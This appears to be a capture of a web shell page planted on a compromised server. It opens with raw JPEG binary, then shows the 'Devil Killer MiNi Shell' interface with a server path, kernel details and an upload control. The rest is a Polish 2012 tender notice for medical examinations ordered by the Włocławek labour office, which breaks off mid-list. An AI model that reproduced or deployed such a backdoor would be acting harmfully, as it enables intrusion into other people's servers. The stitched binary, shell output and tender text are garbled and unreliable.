JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/29732-N-2012.html

<p class="kh_header"><b>Włocławek: WYKONYWANIE BADAŃ LEKARSKICH DLA POWIATOWEGO URZĘDU PRACY WE WŁOCŁAWKU</b><br>
<b>Numer ogłoszenia: 29732 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Kapitulna 24, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 234 00 89, faks 054 231 07 82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupwloclawek.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONYWANIE BADAŃ LEKARSKICH DLA POWIATOWEGO URZĘDU PRACY WE WŁOCŁAWKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na wykonywaniu badań lekarskich osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy we Włocławku  oraz pracowników Powiatowego Urzędu Pracy we Włocławku.
Przedmiot zamówienia obejmuje badania lekarskie dla:
1. Osób bezrobotnych i poszukujących pracy zarejestrowanych w PUP Włocławek        kierowanych na:
a)	szkolenia zawodowe o specjalności:
- prawo jazdy kat. C, C+E, D,
- tokarz, frezer, operator obrabiarek sterowanych numerycznie,
- cieśla,
- układacz nawierzchni drogowych,
- operator sprzętu ciężkiego (różne typy maszyn),
- uprawnienia elektroenergetyczne do 1 kV,
- spawacz,
- opiekun osób wymagających pomocy w samodzielnej egzystencji,
- pracownik ochrony,
- glazurnik, technolog robót wykończeniowych w budownictwie,
- murarz, tynkarz,
- zbrojarz, betoniarz,
- monter rusztowań budowlanych,
- pracownik realizujący prace dociepleniowe budynków,
- operator wózków jezdniowych z napędem silnikowym, 
- pilarz, drwal,
- kucharz, barman, kelner,
- kosmetyczka,
b)  staż,
c)  przygotowanie zawodowe dorosłych,
d)  prace społecznie użyteczne,
e)  roboty publiczne.
2. Osób bezrobotnych, które odmowę podjęcia pracy uzasadniają stanem zdrowia.
3. Pracowników PUP Włocławek kierowanych na badania:
a)	wstępne przy pracy z komputerem oraz bez komputera,
b)	okresowe przy pracy z komputerem oraz bez komputera,
c)	kontrolne przy pracy z komputerem oraz bez komputera.
4. Pracowników PUP Włocławek zajmujących stanowiska kierownicze skierowanych na badania:
a) wstępne przy pracy z komputerem oraz bez komputera,
b) okresowe przy pracy z komputerem oraz bez komputera,
c) kontrolne przy pracy z komputerem oraz bez komputera.
5. Pracowników PUP Włocławek zajmujących stanowisko kierowcy skierowanych na badania:
a) wstępne,
b) okresowe,
c) kontrolne.
6. Pracowników niepełnosprawnych PUP Włocławek zaliczonych do znacznego bądź umiarkowanego stopnia niepełnosprawności w celu korzystania ze skróconej normy czasu pracy.

Wykonawca zobowiązany jest przeprowadzać badania lekarskie w szczególność zgodnie z ustawą 
z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317                z późn. zm.), ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.) oraz Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U z 1996 r. Nr 69 poz. 1586), a także z art. 15 ustawy z dnia 27 sierpnia     1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. nr 127 poz. 721), a także innymi aktualnie obowiązującymi w tym zakresie przepisami prawa.
Pozostała część opisu przedmiotu zamówienia znajduje się w Specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie przewiduje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy posiadają wpis do rejestru podmiotów leczniczych prowadzonego przez Wojewodę Kujawsko - Pomorskiego na postawie ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.).
Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokona na podstawie złożonego wraz z ofertą oświadczenia o posiadaniu wpisu do rejestru podmiotów leczniczych prowadzonego przez Wojewodę Kujawsko - Pomorskiego na postawie ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.), zgodnie z załącznikiem nr 2 do SIWZ, stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 1 do SIWZ. Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokona stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy dysponują lub będą dysponować podczas wykonywania badań lekarskich, o których mowa w CZĘŚCI I pkt 3 SIWZ, pomieszczeniem zlokalizowanym we Włocławku, wyposażonym w odpowiednie urządzenia i sprzęt diagnostyczno - leczniczy.

Ilość pomieszczeń, odpowiednich urządzeń i sprzętu diagnostyczno - leczniczego musi być taka, aby zapewnić należytą i terminową realizację badań lekarskich. 

Wykonawca w celu realizacji zamówienia może polegać na potencjalne technicznym do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków.
Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokona na podstawie złożonych wraz z ofertą niżej wymienionych oświadczeń i dokumentów, stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku udziału w postępowaniu, to jest: 1.) Oświadczenie, że Wykonawca dysponuje lub będzie dysponował podczas wykonywania badań lekarskich, o których mowa w CZĘŚCI I pkt 3 SIWZ, pomieszczeniem wyposażonym w odpowiednie urządzenia i sprzęt diagnostyczno - leczniczy, zgodnie z załącznikiem nr 4 do SIWZ, zawierającym informacje o: - lokalizacji pomieszczenia, - podstawie dysponowania pomieszczeniem, urządzeniami i sprzętem diagnostyczno - leczniczym. 2.) W przypadku polegania przez Wykonawcę na potencjale technicznym innych podmiotów niezależnie od charakteru prawnego łączącego go z nim stosunków,  Wykonawca złoży wraz z ofertą pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dokument (tych podmiotów) wskazujący, że będzie dysponował zasobami niezbędnymi do realizacji przedmiotowego zamówienia. Treść zobowiązania podmiotu powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu, czego konkretnie dotyczy zobowiązanie, w tym jakiego okresu dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy dysponują lub będą dysponować osobami do przeprowadzania badań lekarskich, które posiadają wymagane uprawnienia, o których mowa w szczególności w ustawie z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317 z późn. zm.), ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.) oraz Rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U z 1996 r. Nr 69 poz. 1586), a także w innych aktualnie obowiązujących w tym zakresie przepisach prawa.
Ilość osób posiadających uprawnienia do wykonywania badań lekarskich musi być taka, aby zapewnić należytą i terminową ich realizację. Wykonawca w celu realizacji zamówienia może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków.
Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokona na podstawie złożonych wraz z ofertą niżej wymienionych oświadczeń i dokumentów, stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku udziału w postępowaniu, to jest: 1.) Oświadczenie, że Wykonawca dysponuje lub będzie dysponować osobami, wymienionymi  w CZĘŚCI II pkt 2.2. SIWZ, posiadającymi wymagane uprawnienia do wykonywania badań lekarskich, o których mowa w CZĘŚCI I pkt 3 SIWZ, zgodnie z załącznikiem nr 3 do SIWZ. 2.) W przypadku polegania przez Wykonawcę na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączącego go z nim stosunków,  Wykonawca złoży wraz z ofertą pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia lub inny dokument (tych podmiotów) wskazujący, że będzie dysponował zasobami niezbędnymi do realizacji przedmiotowego zamówienia. Powyższe nie dotyczy przypadku, gdy Wykonawca dysponuje lub będzie dysponował bezpośrednio tymi osobami, tj.: bez pośrednictwa innych podmiotów. Treść zobowiązania podmiotu powinna określać: kto jest podmiotem przyjmującym zasoby, zakres zobowiązania podmiotu, czego konkretnie dotyczy zobowiązanie, w tym jakiego okresu dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających ten warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 1 do SIWZ. Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokona stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Cenowy zgodnie z załącznikiem nr 7a, 7b i 7c do SIWZ.
2. Formularz Ofertowy zgodnie z załącznikiem nr 8 do SIWZ.
3. Cennik na wszystkie wykonywane przez Wykonawcę badania lekarskie.
4. Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać w szczególności: ustanowionego pełnomocnika oraz zakres jego umocowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień zawartej umowy oraz określenie warunków tych zmian: 
1. Zmiana postanowień zawartej umowy może nastąpić w przypadku wystąpienia zmiany przepisów prawa dotyczących przedmiotu zamówienia, rozszerzenie przedmiotu zamówienia o inne rodzaje badań lekarskich dla osób bezrobotnych, poszukujących pracy i pracowników PUP Włocławek oraz wystąpienia niezależnych od Zamawiającego i Wykonawcy istotnych okoliczności, których nie można było przewidzieć przy zachowaniu należytej staranności.
2. Zmiana umowy może nastąpić na podstawie pisemnego wniosku, w którym należy umotywować zasadność proponowanych zmian. Zmiany umowy dokonuje się w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pupwloclawek.samorzady.pl/kat/id/87<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Włocławku pok. 12 ul. Kapitulna 24, 87-800 Włocławek..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2012 godzina 09:00, miejsce: Powiatowy Urząd Pracy we Włocławku pok. 3 ul. Kapitulna 24, 87-800 Włocławek..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WYKONYWANIE BADAŃ LEKARSKICH DLA POWIATOWEGO URZĘDU PRACY WE WŁOCŁAWKU (dotyczy badań lekarskich osób bezrobotnych i poszukujących pracy 
kierowanych na szkolenia zawodowe) - CZĘŚĆ I zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje badania lekarskie dla osób bezrobotnych i poszukujących pracy zarejestrowanych w PUP Włocławek kierowanych na szkolenia zawodowe o specjalności:
- prawo jazdy kat. C, C+E, D,
- tokarz, frezer, operator obrabiarek sterowanych numerycznie,
- cieśla,
- układacz nawierzchni drogowych,
- operator sprzętu ciężkiego (różne typy maszyn),
- uprawnienia elektroenergetyczne do 1 kV,
- spawacz,
- opiekun osób wymagających pomocy w samodzielnej egzystencji,
- pracownik ochrony,
- glazurnik, technolog robót wykończeniowych w budownictwie,
- murarz, tynkarz,
- zbrojarz, betoniarz,
- monter rusztowań budowlanych,
- pracownik realizujący prace dociepleniowe budynków,
- operator wózków jezdniowych z napędem silnikowym, 
- pilarz, drwal,
- kucharz, barman, kelner,
- kosmetyczka.

Wykonawca zobowiązany jest przeprowadzać badania lekarskie w szczególność zgodnie z ustawą 
z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317                z późn. zm.), ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.) oraz Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U z 1996 r. Nr 69 poz. 1586), a także z art. 15 ustawy z dnia 27 sierpnia     1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. nr 127 poz. 721), a także innymi aktualnie obowiązującymi w tym zakresie przepisami prawa.


Pozostała część opisu przedmiotu zamówienia znajduje się w Specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYKONYWANIE BADAŃ LEKARSKICH DLA POWIATOWEGO URZĘDU PRACY WE WŁOCŁAWKU (dotyczy badań lekarskich osób bezrobotnych i poszukujących pracy kierowanych na staż, przygotowanie zawodowe dorosłych, prace społecznie użyteczne oraz roboty publiczne, a także osób, które odmowę podjęcia pracy uzasadniają stanem zdrowia)
- CZĘŚĆ II zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje badania lekarskie dla osób bezrobotnych i poszukujących pracy zarejestrowanych w PUP Włocławek        kierowanych na:
a)  staż,
b)  przygotowanie zawodowe dorosłych,
c)  prace społecznie użyteczne,
d)  roboty publiczne.
2. Osób bezrobotnych, które odmowę podjęcia pracy uzasadniają stanem zdrowia.
Wykonawca zobowiązany jest przeprowadzać badania lekarskie w szczególność zgodnie z ustawą 
z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317                z późn. zm.), ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.) oraz Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U z 1996 r. Nr 69 poz. 1586), a także z art. 15 ustawy z dnia 27 sierpnia     1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. nr 127 poz. 721), a także innymi aktualnie obowiązującymi w tym zakresie przepisami prawa.


Pozostała część opisu przedmiotu zamówienia znajduje się w Specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WYKONYWANIE BADAŃ LEKARSKICH DLA POWIATOWEGO URZĘDU PRACY WE WŁOCŁAWKU (dotyczy badań lekarskich pracowników PUP Włocławek) - CZĘŚĆ III zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje badania lekarskie dla:
1. Pracowników PUP Włocławek kierowanych na badania:
a)	wstępne przy pracy z komputerem oraz bez komputera,
b)	okresowe przy pracy z komputerem oraz bez komputera,
